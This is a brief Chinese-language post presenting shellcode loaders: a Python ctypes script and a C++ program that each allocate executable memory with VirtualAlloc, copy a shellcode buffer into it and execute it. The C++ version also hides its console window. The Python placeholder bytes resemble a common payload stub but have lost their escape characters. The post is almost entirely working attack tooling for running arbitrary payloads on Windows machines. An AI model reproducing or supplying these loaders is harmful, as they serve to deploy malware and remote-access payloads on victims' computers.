shellcode加载器编写

Python3 shellcode通用加载器

#!/usr/bin/python3
import ctypes

#shellcode 放这个位置
c = b"xfcxe8x89x00x00x00x60x89xe5x31"

shellcode = bytearray(c)

ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))
 
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
                                     buf,
                                     ctypes.c_int(len(shellcode)))

ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.c_int(ptr),
                                         ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.pointer(ctypes.c_int(0)))
 
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))

c++加载器

#include <Windows.h>
#include <stdio.h>
using namespace std;
#pragma comment(linker,"/subsystem:"windows" /entry:"mainCRTStartup"")
#pragma comment(linker, "/INCREMENTAL:NO")

int main(int argc, char** argv) {
    unsigned char ShellCode[] = "";

    void* exec = VirtualAlloc(0, sizeof ShellCode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, ShellCode, sizeof ShellCode);
    ((void(*)())exec)();
    return 0;
}